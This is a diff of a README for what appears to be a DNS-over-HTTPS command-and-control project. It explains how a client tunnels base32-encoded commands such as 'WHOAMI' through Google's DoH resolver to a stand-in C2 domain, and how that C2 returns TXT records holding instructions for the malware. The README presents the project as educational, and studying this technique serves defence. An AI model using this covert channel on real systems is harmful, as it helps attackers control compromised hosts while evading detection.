alex362/Dns-over-HTTPS-DOH/README.md

 # Architecture
 ![image](https://github.com/user-attachments/assets/e0e0c705-e5a2-4934-b265-f70e39ca668b)

-The python program on the client side sends HTTPS request (TCP/443) to DoH Server to resolve a destination domain where the c2 is hosted, e.g send.example.com.co using a  the legit DOH server, json query like https[:]//dns.google.com/resolve?name=google.com &type=TXT
+The python program on the client side sends HTTPS request (TCP/443) to DoH Server to resolve a destination domain where the c2 is hosted, e.g send.example.com.co using a  the legit DOH server, json query like https[:]//dns.google.com/resolve?name=google.com&type=TXT
-An attacker can use the part which is between the name and ‘&’ to inject txt record which is not bigger than 512 bytes of size e.g https[:]//dns.google.com/resolve?name=SINGLE-1-K5EE6QKNJEFA====.send.example.com.co&type=TXT
+An attacker can use the part which is between the name and & from the url to inject txt record which is not bigger than 512 bytes of size.
+Example: https[:]//dns.google.com/resolve?name=SINGLE-1-K5EE6QKNJEFA====.send.example.com.co&type=TXT
-'**SINGLE-1-K5EE6QKNJEFA====**' is base32 encoded query (K5EE6QKNJEFA====  is basically WHOAMI
+1. '**SINGLE-1-K5EE6QKNJEFA====**' is base32 encoded query (K5EE6QKNJEFA====  is basically WHOAMI
+)
-) send.example.com.co => the DNS c2 server.
+2.send.example.com.co => the DNS c2 server.

-The google.com is instructed to query the send.example.com.co DNS server for the TXT record.
+The dns.google.com is instructed to query the send.example.com.co DNS server for the TXT record.
-The DNS server send.example.com.co then returns back txt record in which instructions are send what the client needs to perform next.
+The DNS server send.example.com.co  returns back txt record in which there are instructions what the client needs to perform next.
 Bellow is example it the answer section of the response are the instructions the client/malware will execute.

 # Testing and Limitations
 This project is intended for educational purposes and authorized security research only.